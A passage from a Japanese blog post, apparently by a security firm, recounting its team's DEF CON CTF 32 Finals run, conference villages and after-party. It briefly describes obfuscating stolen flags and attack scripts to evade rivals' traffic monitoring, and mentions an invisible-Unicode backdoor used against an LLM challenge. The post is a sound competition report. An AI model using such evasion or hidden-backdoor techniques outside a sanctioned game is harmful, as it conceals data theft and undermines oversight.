そこで、実際の競技では攻撃コードを作成したりパッチを当てたりする人以外に、ネットワークに流れるペイロードを監視し、自チームのフラグが流出していないか確認するツールが常に稼働していました。

通常の問題であれば、フラグを取得するペイロードを送信した場合、そのレスポンスとして平文のフラグがネットワークを流れるため、これを検知できました。一方、この問題では自由な JavaScript のコードを実行できるため、取得したフラグを暗号化して送信することで、フラグの流出を検知されることを防ぐことができます。 我々は、送信するフラグおよびスクリプトを難読化して攻撃することで、他チームからフラグを抜き取っていることを隠していました。

所感

一つの問題にしては脆弱性の数が多くまたそれら脆弱性の質的な部分で疑問があったものの、Jeoparty にはない A&D 固有の戦略を取ったり、リアルタイムでの攻防があったりと、非常に新鮮で面白い問題でした。

 

DEF CON CTF 32 Finals 結果

DEF CON 32 CTF Finals は、世界2位という素晴らしい成績でした。 チームは途中まで1位を守っていましたが、惜しくも最終日に逆転されてしまいました。

 

投影されたスコアボード

今年度は国際チームということもあり、各国のノウハウを結集して臨んだ Finals となりました。日本からは Reversing や Pwn ジャンルの人材が多く出場し、A&D システムの解析と攻撃 Exploit の作成に大きく貢献していました。他にも LLM を扱った問題では、不可視のユニコード文字でバックドアを作成する、ユニークな攻撃を行っていました。別の CTF では敵チームであることも多い他国のメンバーと、仲間として CTF に参加できる貴重な機会となりました。

DEF CON 32 Village

DEF CON 32 では CTF 以外にも様々なイベントが開催されており、自由に出入りできます。興味深かった Village やイベントをいくつか紹介します。

毎日変わる会場のサイネージ

Linecon

DEF CON 初日に開催される、Registration とグッズ購入のために列に並ぶイベントのことを Linecon と呼びます。会場の端から端までを長蛇の列が埋め尽くします。今年は開場時間からすこし遅れたためか、4時間半並び続けました。

参加チケットである HUMAN BADGE

Car Hacking Village

毎年恒例の車をハックする Village で、今年は Rivian の車が鎮座しています。ECU ハックを試みることができるテーブルも設置されおり、ハッカーたちが各々侵入を試していました。同じ Village で Tesla 車が貰える CTF も開催されていました。

Car Hacking Village のハッカーたち

Physical Security Village

物理的なセキュリティを扱う Village では、ブランクキーを加工することでオリジナルのキーを複製するコーナーが設置されていました。実際にテスト用のキーを複製し、開錠までを体験しました。

ブランクキーを加工する工具

DEF CON CTF Finals After Party

DEF CON 公式のイベントではありませんが、毎年 CTF の終わりの夜に有志によるアフターパーティが開催されます。50階スイートルームを貸し切り行うパーティには、Finals に出たチームが一堂に会します。他チームのメンバーと解法を共有しながら議論できる貴重なイベントです。

窓の外の Sphere と冷やされるフリードリンク

おわりに

DEF CON CTF では、実際の業務で用いるアプリケーションの解析や Exploit の技術から、LLM のような最新のセキュリティテーマまでを広く学ぶ機会を与えてくれます。また、世界中のトップハッカーと競り合う経験は、エンジニアとして大きな成長の糧となります。これからもリチェルカセキュリティでは、社員・アルバイトの方の自己研鑽のための渡航費・宿泊費を支援する予定です。

本記事の執筆に携わったArata、iwancof、iwashiiraは、リチェルカセキュリティでパートタイマーとして働いています。当社には他にもCTFの技術を生かせる領域で若い才能にお任せしたい業務がたくさんあります。この記事を読んで当社の取り組みにご興味を持った方は、ぜひ カジュアル面談 にお申し込みください。

 

社員・アルバイトの昼食チャレンジ

ラスベガスの夜景

 

DEF CON CTF に参加してくださった社員・アルバイトの方々、そして協力してくださった国内外チームのメンバーの方々、ありがとうございました!2025年の DEF CON 33 でお会いしましょう👋